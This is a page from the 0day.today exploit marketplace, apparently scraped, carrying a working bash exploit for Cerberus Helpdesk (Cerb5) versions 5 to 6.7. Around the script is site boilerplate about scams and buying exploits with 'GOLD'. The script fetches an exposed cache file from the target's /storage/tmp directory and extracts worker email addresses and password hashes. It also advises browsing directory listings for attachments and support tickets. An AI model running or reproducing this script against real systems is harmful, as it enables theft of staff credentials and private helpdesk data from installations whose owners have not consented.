0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure
#!/bin/bash ##################################################################################### # Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing # # Date: 04.02.2016 # # Exploit Author: asdizzle_ # # Vendor Homepage: http://www.cerberusweb.com/ # # Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip # # Version: 5 - 6.7 # # Tested on: Debian 8 / apache2 with cerb 5 # ##################################################################################### # Prerequisites: # # -At least one worker must be logged in # # -/storage/tmp/ dir must be accessible # # # # If everything else fails try if there's directory listing in /storage/tmp # # You might find attachments and even support tickets. # ##################################################################################### url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !) pre='devblocks' # If this doesn't work try 'zend' echo "[*] Trying to fetch cache file" cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass) if [ -z "$cachechk" ];then echo "[-] File not found." exit else echo "[+] Found. Extracting..." hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g') if [ -z "$hashes" ];then echo "[-] Hash extracting failed" else echo "[+] Extracting seems to have worked" echo echo "$hashes" fi fi # 0day.today [2024-11-16] #